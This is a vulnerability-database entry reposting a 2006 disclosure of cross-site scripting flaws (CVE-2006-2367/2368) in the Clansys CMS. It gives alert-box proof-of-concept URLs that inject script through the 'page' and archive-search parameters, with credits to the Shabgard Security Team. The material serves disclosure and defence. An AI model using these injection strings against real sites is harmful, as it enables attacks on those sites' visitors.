Clansys Multiple Xss Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053249 漏洞类型
发布时间 2006-05-16 更新时间 2006-05-16
CVE编号 CVE-2006-2368
CVE-2006-2367
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006050089
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
---------------------------------------------
Clansys v.1.1 Multiple Xss Vulnerabilities
---------------------------------------------

Bug:
Clansys v.1.0
1- http://victim/path/index.php?page=archiv&func=search 
"><script>alert(/Soot/)</script>

Clansys v.1.1
1- http://victim/path/index.php?page="><script>alert(/Soot/)</script>

2- http://victim/path/index.php?page=archiv&func=search 
"><script>alert(/Soot/)</script>

---------------------------------------------
Source :
http://soot.shabgard.org/bugs/Clansys.txt

Credit :
Soot 
Shabgard Security Team
http://www.shabgard.org 

Greetz : 
Hregy,Elite,Bl2k,Littlehacker
---------------------------------------------